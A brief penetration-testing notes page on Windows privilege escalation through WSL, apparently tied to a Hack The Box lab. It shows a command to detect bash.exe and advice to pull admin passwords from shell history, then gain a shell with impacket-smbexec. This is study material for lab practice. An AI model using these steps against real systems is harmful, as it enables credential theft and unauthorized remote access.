# WSL

## Enumeration

Search for `bash.exe`:

```powershell
where /R c:\Windows bash.exe
```

If `bash.exe` exists on the machine, then WSL is installed.

## Exploitation

Search for admin password on the system, for example, using the history command. If we get a SMB password, we can get a shell with impacket-smbexec:

```bash
impacket-smbexec '<username>:<password>'@<target_ip>
```

## Lab: Hack The Box - SecNotes

{% embed url="<https://www.ctfwriteup.com/tryhackme/tcm-windows-privilege-escalation-course/hack-the-box-secnotes-medium>" %}
Hack The Box - SecNotes
{% endembed %}